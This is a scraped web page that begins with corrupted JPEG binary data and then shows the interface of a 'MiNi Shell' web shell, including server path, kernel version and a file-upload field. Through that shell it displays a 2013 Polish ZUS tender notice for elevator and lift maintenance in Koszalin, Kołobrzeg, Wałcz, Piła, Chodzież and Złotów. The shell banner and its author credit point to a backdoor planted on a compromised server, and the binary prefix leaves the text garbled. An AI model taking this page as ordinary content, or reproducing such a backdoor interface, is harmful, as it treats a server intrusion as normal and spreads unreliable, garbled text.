JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/303910-N-2013.html

<p class="kh_header"><b>Szczecin: Świadczenie usług serwisu - konserwacji i naprawy dźwigów oraz platform dźwigowych w podziale na 5 części: Część 1 - Oddziale ZUS w Koszalinie, Część 2 - Inspektoracie ZUS w Kołobrzegu, Część 3 - Inspektoracie ZUS w Wałczu. Część 4 - w budynkach A i B Oddziału ZUS w Pile; Część 5 - Inspektoratach ZUS w Chodzieży i Złotowie</b><br>
<b>Numer ogłoszenia: 303910 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych w Warszawie, Oddział w Szczecinie , ul. Matejki 22, 70-530 Szczecin, woj. zachodniopomorskie, tel. 91 459 65 77, 91 459 65 78, faks 91 459 65 76.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług serwisu - konserwacji i naprawy dźwigów oraz platform dźwigowych w podziale na 5 części: Część 1 - Oddziale ZUS w Koszalinie, Część 2 - Inspektoracie ZUS w Kołobrzegu, Część 3 - Inspektoracie ZUS w Wałczu. Część 4 - w budynkach A i B Oddziału ZUS w Pile; Część 5 - Inspektoratach ZUS w Chodzieży i Złotowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzanie comiesięcznego świadczenia serwisu urządzeń dźwigowych, w tym przeglądów, konserwacji, napraw oraz utrzymania pogotowia dźwigowego, zainstalowanych w budynkach Zamawiającego, zgodnie z specyfikacją urządzeń dźwigowych stanowiącą załączniki do wzorów umów oraz zgodnie ze złożoną ofertą, w podziale na części: 

Część 1- wykonywanie przeglądów, konserwacji oraz napraw dźwigów osobowych eksploatowanych w Oddziale ZUS w Koszalinie:
Dźwig osobowy. Model/Producent: D8 NE 4077 OTIS, Rok produkcji: 2004, nr fabryczny: N3111001156, zainstalowany w Oddziale ZUS w Koszalinie ul. Fałata 30,
Dźwig osobowo-towarowy. Model/producent: D8 NE 4078 HIDRAL S.A./OTIS, Rok produkcji: 2004,  nr fabryczny: N3111001155, zainstalowany w Oddziale ZUS w Koszalinie ul. Fałata 30.

Część 2 - wykonywanie przeglądów, konserwacji oraz naprawy dźwigu osobowego eksploatowanego w Inspektoracie ZUS w Kołobrzegu,
Dźwig osobowy. Model/Producent: P02H PILAWA, 2002, zainstalowany w Inspektoracie ZUS w Kołobrzegu ul. Łopuskiego 21.

Część 3 - wykonywanie przeglądów, konserwacji oraz napraw platformy dźwigowej eksploatowanej w Inspektoracie ZUS w Wałczu,
Platforma dźwigowa. Model/Producent: VIMEC V-61 PILAWA, Rok produkcji: 1999, zainstalowany w Inspektoracie ZUS w Wałczu ul. Dąbrowskiego 11.

Część 4 - wykonywanie przeglądów, konserwacji oraz napraw dźwigów osobowych eksploatowanych w budynkach A i B Oddziału ZUS w Pile;
Dźwig osobowy. Producent: Kombinat Dźwigów Osobowych ZREMB Warszawa, Model: A-22470, Rok produkcji: 1991, zainstalowany w Oddziale ZUS Piła budynek A
ul. Dr. Drygasa 7,
Dźwig elektryczny ODA, osobowy. Producent: Kombinat Dźwigów Osobowych ZREMB Warszawa, Model: A-22471, Rok produkcji: 1991, zainstalowany w Oddziale ZUS Piła budynek A
ul. Dr. Drygasa 7,
Dźwig hydrauliczny, osobowy, samoobsługowy. Producent: MONITOR spa Milano Italia, Rok produkcji: 2003, Model: 238231, zainstalowany w Oddziale ZUS Piła budynek B ul. Dr. Drygasa 5.

Część 5 - wykonywanie przeglądów, konserwacji oraz napraw platform dźwigowych eksploatowanych w budynkach Inspektoratów ZUS w Chodzieży i Złotowie.
Platforma dźwigowa Q-300 kg - elektryczna. Producent  PRO-REHA Poznań. Rok produkcji: 1996, zainstalowany w Inspektoracie ZUS w Chodzieży ul. Mostowa 2,
Platforma dźwigowa Q-300 kg -, elektryczna. Producent: PRO-REHA Poznań, Rok produkcji:  1997, zainstalowany w Inspektoracie ZUS w Złotowie Al. Piasta 37.

Realizacja przedmiotu zamówienia musi być zgodna z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 29 października 2003 r. w sprawie warunków technicznych dozoru technicznego w zakresie eksploatacji niektórych urządzeń transportu bliskiego (Dz. U. Nr 193 poz. 1890 z dnia 18 listopada 2003 r.).

Szczegółowe warunki realizacji przedmiotu zamówienia i obowiązki wykonawcy zawierają wzory umów dołaczone do SIWZ dla poszczególnych części wraz z załącznikami.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7, 50.74.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony, jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku nr 2 do SIWZ oraz załączy  do oferty wykaz usług jako załącznik nr 5 do siwz, oferty (Wykonawca składa jeden wykaz, bez względu na ile części składa oferty), że wykonał,  lub nadal wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę zgodną z przedmiotem zamówienia o wartości nie mniejszej niż:
- dla Części 1 - 12 000,00 zł brutto,
- dla Części 2 -   7 000,00 zł brutto,
- dla Części 3 -   3 500,00 zł brutto,
- dla Części 4 - 30 000,00 zł brutto,
- dla Części 5 -   6 000,00 zł brutto.
   Jeżeli Wykonawca składa ofertę na więcej niż jedną część, minimalna wartość wykonanych usług będących przedmiotem zamówienia musi stanowić wartości zsumowanych części.

Do wykazu należy dołączyć dowód, dowody, poświadczenia, referencje potwierdzające, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania odpowiednim potencjałem technicznym, zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty z oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku nr 2 do SIWZ wraz z 
oświadczeniem, że dysponuje osobą/osobami posiadającymi uprawnienia potwierdzone ważnym świadectwem kwalifikacji E i D do eksploatacji urządzeń, instalacji i sieci energetycznych o napięciu wyższym niż 1 kV oraz posiadających uprawnienia do prowadzenia konserwacji urządzeń dźwigowych potwierdzone zaświadczeniem kwalifikacyjnym wydanym przez właściwy organ dozoru technicznego, sporządzone na załączniku do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dotyczący sytuacji ekonomicznej i finansowej zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Do wzoru umowy na Część 1,2,3,4,5 : 
Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, poza przypadkiem, gdy nastąpi zmiana ilości urządzeń dźwigowych objętych serwisem, spowodowana wyłączeniem urządzeń z eksploatacji. W tym przypadku zmniejszeniu ulegnie wysokość wynagrodzenia należnego Wykonawcy, które zostanie pomniejszone odpowiednio i  proporcjonalnie z uwzględnieniem wartości wynagrodzenia i okresu wykonywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zus.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 10:30, miejsce: Ofertę należy złożyć w Samodzielnym Referacie Zamówień Publicznych ZUS O Szczecin, ul. Matejki 22, 70-530 Szczecin, pok. nr 230, (III p.), w terminie do dnia 12.08.2013r., do godz. 10.30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert odbędzie się 12.08.2013r.,o godz. 11.00, w siedzibie Zamawiającego w Szczecinie przy ul. Matejki 22, w sali nr 115,p.II.
Osobami do kontaktu z Wykonawcami są: w zakresie przedmiotu zamówienia w Częściach: 1,2,3: Agnieszka Uzarowicz, tel. 94 348 55 12,Jolanta Kubiszewska, tel. 94 348 59 61,
w zakresie przedmiotu zamówienia dla w Częściach 4 i 5: Tomasz Zawilski, tel. 67 2105871, Marcin Żywica, tel. 67 2105873,
w zakresie prowadzonego postępowania (procedury):Ireneusz Tymanowski tel.  91 4596578, Eryka Śliwczyńska tel. 91 4596577, Agnieszka Dobrzyńska tel. 91 4596930.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług serwisu - konserwacji i naprawy dźwigów oraz platform dźwigowych eksploatowanych w Oddziałach i Inspektora-tach, w podziale na części: Część 1 - w Oddziale ZUS w Koszalinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1- wykonywanie przeglądów, konserwacji oraz napraw dźwigów osobowych eksploatowanych w Oddziale ZUS w Koszalinie:
Dźwig osobowy. Model/Producent: D8 NE 4077 OTIS, Rok produkcji: 2004, nr fabryczny: N3111001156, zainstalowany w Oddziale ZUS w Koszalinie ul. Fałata 30,
Dźwig osobowo-towarowy. Model/producent: D8 NE 4078 HIDRAL S.A./OTIS, Rok produkcji: 2004,  nr fabryczny: N3111001155, zainstalowany w Oddziale ZUS w Koszalinie ul. Fałata 30..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7, 20.74.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Cena 1 godziny prowadzenia napraw brutto - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług serwisu - konserwacji i naprawy dźwigów oraz platform dźwigowych eksploatowanych w Oddziałach i Inspektora-tach, w podziale na części: Część 2 - w Inspektoracie ZUS w Kołobrzegu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - wykonywanie przeglądów, konserwacji oraz naprawy dźwigu osobowego eksploatowanego w Inspektoracie ZUS w Kołobrzegu,
Dźwig osobowy. Model/Producent: P02H PILAWA, 2002, zainstalowany w Inspektoracie ZUS w Kołobrzegu ul. Łopuskiego 21..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7, 50.74.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Cena 1 godziny prowadzenia napraw brutto - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług serwisu - konserwacji i naprawy dźwigów oraz platform dźwigowych eksploatowanych w Oddziałach i Inspektora-tach, w podziale na 5 części: Część 3 - w Inspektoracie ZUS w Wałczu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 - wykonywanie przeglądów, konserwacji oraz napraw platformy dźwigowej eksploatowanej w Inspektoracie ZUS w Wałczu,
Platforma dźwigowa. Model/Producent: VIMEC V-61 PILAWA, Rok produkcji: 1999, zainstalowa-ny w Inspektoracie ZUS w Wałczu ul. Dąbrowskiego 11..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7, 50.74.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Cena 1 godziny prowadzenia napraw brutto - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług serwisu - konserwacji i naprawy dźwigów oraz platform dźwigowych w podziale na 5 części: Część 4 - w budynkach A i B Oddziału ZUS w Pile.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 - wykonywanie przeglądów, konserwacji oraz napraw dźwigów osobowych eksploatowanych w budynkach A i B Oddziału ZUS w Pile:
Dźwig osobowy. Producent: Kombinat Dźwigów Osobowych ZREMB Warszawa, Model: A-22470, Rok produkcji: 1991, zainstalowany w Oddziale ZUS Piła budynek A
ul. Dr. Drygasa 7,
Dźwig elektryczny ODA, osobowy. Producent: Kombinat Dźwigów Osobowych ZREMB Warsza-wa, Model: A-22471, Rok produkcji: 1991, zainstalowany w Oddziale ZUS Piła budynek A
ul. Dr. Drygasa 7,
Dźwig hydrauliczny, osobowy, samoobsługowy. Producent: MONITOR spa Milano Italia, Rok produkcji: 2003, Model: 238231, zainstalowany w Oddziale ZUS Piła budynek B ul. Dr. Dryga-sa 5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7, 50.74.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług serwisu - konserwacji i naprawy dźwigów oraz platform dźwigowych w podziale na 5 części: Część 5 - w Inspektoratach ZUS w Chodzieży i Złotowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5 - wykonywanie przeglądów, konserwacji oraz napraw platform dźwigowych eksploatowanych w budynkach Inspektoratów ZUS w Chodzieży i Złotowie:
Platforma dźwigowa Q-300 kg - elektryczna. Producent  PRO-REHA Poznań. Rok produkcji: 1996, zainstalowany w Inspektoracie ZUS w Chodzieży ul. Mostowa 2,
Platforma dźwigowa Q-300 kg -, elektryczna. Producent: PRO-REHA Poznań, Rok produkcji:  1997, zainstalowany w Inspektoracie ZUS w Złotowie Al. Piasta 37..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7, 50.74.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com